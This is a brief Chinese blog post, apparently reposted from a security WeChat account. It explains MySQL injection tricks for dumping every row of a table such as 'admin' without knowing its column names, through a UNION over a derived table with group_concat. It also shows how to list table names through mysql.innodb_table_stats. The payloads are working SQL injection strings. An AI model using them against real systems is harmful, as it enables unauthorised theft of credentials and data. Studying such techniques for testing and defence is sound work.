有时候我们不知道列名,因为不能访问Information_Schema或者其他原因
但是我们知道表名,我们可以在不知道列名的情况下dump出该表的全部数据
我们有两个表 article、admin
方案一
select title from article where id = 4 and 0 union SELECT group_concat(a, 0x3a, b) FROM (SELECT 1 a,2 b,3 c UNION SELECT * FROM admin)x方案二
方案二是在exploit-db上看到的文章,Mysql版本大于5.5的情况下,
默认mysql数据库中多了两个表innodb_table_stats、innodb_table_index用来储存所有数据库名和表名
如果我们想获取某个数据库下面所有表名称
select table_name from mysql.innodb_table_stats where database_name=数据库名;https://www.exploit-db.com/docs/41274.pdf
本文始发于微信公众号(T00ls):【奇技淫巧】Mysql注入时,猜不到列名,获取所有数据
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论